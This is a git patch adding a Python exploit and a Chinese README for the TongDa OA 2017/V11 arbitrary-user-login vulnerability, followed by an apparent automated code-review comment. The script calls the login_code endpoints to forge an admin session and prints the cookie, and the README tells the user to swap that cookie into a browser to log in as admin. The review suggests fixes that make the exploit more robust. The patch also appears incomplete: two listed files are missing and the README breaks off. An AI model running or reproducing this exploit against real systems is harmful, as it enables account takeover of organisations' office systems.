From 785a3cca174e50fdd93578db43dd590c806dbda0 Mon Sep 17 00:00:00 2001
From: dabiaoge <21156949+helloexp@users.noreply.github.com>
Date: Thu, 13 Jan 2022 15:48:49 +0800
Subject: [PATCH] =?UTF-8?q?=E6=B7=BB=E5=8A=A0=E9=80=9A=E8=BE=BEOA=20?=
 =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E5=88=A9=E7=94=A8exp?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 01-通达OA/POC.py | 113 ++++++++++++++++++++++++++++++++++++++++++++
 01-通达OA/README.md | 13 +++++
 01-通达OA/用法.txt | 1 +
 01-通达OA/路径.txt | 1 +
 4 files changed, 128 insertions(+)
 create mode 100644 01-通达OA/POC.py
 create mode 100644 01-通达OA/README.md
 create mode 100644 01-通达OA/用法.txt
 create mode 100644 01-通达OA/路径.txt
diff --git a/01-通达OA/POC.py b/01-通达OA/POC.py
new file mode 100644
index 0000000..306ba53
--- /dev/null
+++ b/01-通达OA/POC.py
@@ -0,0 +1,113 @@
+'''
+@Author : Sp4ce
+@Date : 2020-03-17 23:42:16
+@LastEditors : Sp4ce
+@LastEditTime : 2020-04-22 16:24:52
+@Description : Challenge Everything.
+'''
+import requests
+from random import choice
+import argparse
+import json
+
+USER_AGENTS = [
+ "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
+ "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
+ "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
+ "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
+ "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
+ "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
+ "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
+ "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
+ "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
+ "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
+ "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
+ "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
+ "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
+ "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
+ "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
+ "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
+ "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
+ "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
+ "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
+ "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
+ "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
+ "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
+ "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
+ "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
+ "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
+ "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
+ "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
+ "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
+ "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
+ "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
+ "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
+ "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
+ "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
+ "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
+]
+
+headers={}
+
+def getV11Session(url):
+ checkUrl = url+'/general/login_code.php'
+ try:
+ headers["User-Agent"] = choice(USER_AGENTS)
+ res = requests.get(checkUrl,headers=headers)
+ resText = str(res.text).split('{')
+ codeUid = resText[-1].replace('}"}', '').replace('\r\n', '')
+ getSessUrl = url+'/logincheck_code.php'
+ res = requests.post(
+ getSessUrl, data={'CODEUID': '{'+codeUid+'}', 'UID': int(1)},headers=headers)
+ print('[+]Get Available COOKIE:'+res.headers['Set-Cookie'])
+ except:
+ print('[-]Something Wrong With '+url)
+
+
+
+def get2017Session(url):
+ checkUrl = url+'/ispirit/login_code.php'
+ try:
+ headers["User-Agent"] = choice(USER_AGENTS)
+ res = requests.get(checkUrl,headers=headers)
+ resText = json.loads(res.text)
+ codeUid = resText['codeuid']
+ codeScanUrl = url+'/general/login_code_scan.php'
+ res = requests.post(codeScanUrl, data={'codeuid': codeUid, 'uid': int(
+ 1), 'source': 'pc', 'type': 'confirm', 'username': 'admin'},headers=headers)
+ resText = json.loads(res.text)
+ status = resText['status']
+ if status == str(1):
+ getCodeUidUrl = url+'/ispirit/login_code_check.php?codeuid='+codeUid
+ res = requests.get(getCodeUidUrl)
+ print('[+]Get Available COOKIE:'+res.headers['Set-Cookie'])
+ else:
+ print('[-]Something Wrong With '+url + ' Maybe Not Vulnerable ?')
+ except:
+ print('[-]Something Wrong With '+url)
+
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser()
+ parser.add_argument(
+ "-v",
+ "--tdoaversion",
+ type=int,
+ choices=[11, 2017],
+ help="Target TongDa OA Version. e.g: -v 11、-v 2017")
+ parser.add_argument(
+ "-url",
+ "--targeturl",
+ type=str,
+ help="Target URL. e.g: -url 192.168.2.1、-url http://192.168.2.1"
+ )
+ args = parser.parse_args()
+ url = args.targeturl
+ if 'http://' not in url:
+ url = 'http://' + url
+ if args.tdoaversion == 11:
+ getV11Session(url)
+ elif args.tdoaversion == 2017:
+ get2017Session(url)
+ else:
+ parser.print_help()
diff --git a/01-通达OA/README.md b/01-通达OA/README.md
new file mode 100644
index 0000000..6a28f20
--- /dev/null
+++ b/01-通达OA/README.md
@@ -0,0 +1,13 @@
+# TongDaOA-Fake-User
+通达OA 前台任意用户登录漏洞
+
+**仅供安全研究,禁止非法利用!**
+
+# 使用方法
+1. python3 poc.py -v 版本 -url url
+2. 运行并获取到可用的SESSIONID
+3. 替换浏览器Cookie中的SESSIONID即可实现登录为admin
+
+# 影响范围
+
+**通达OA2017、V11.X
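Review bot: The bare `except:` at the end of getV11Session, and the identical one in get2017Session, catches every exception including KeyboardInterrupt and SystemExit, and collapses all distinct failures (a connection error, a response body that is not the expected JSON/text, a missing `Set-Cookie` header) into the same "Something Wrong" line, so the actual cause is never shown. Narrow it to what the try body can raise and surface the reason, e.g. `except (requests.RequestException, KeyError, IndexError, ValueError) as exc:` followed by `print('[-]Something Wrong With '+url+': '+repr(exc))`. The module-level `headers` dict is also mutated on every call; building a per-call dict avoids that shared state. Separately, the README usage line refers to `poc.py` while the file added here is `POC.py`, which will not resolve on a case-sensitive filesystem.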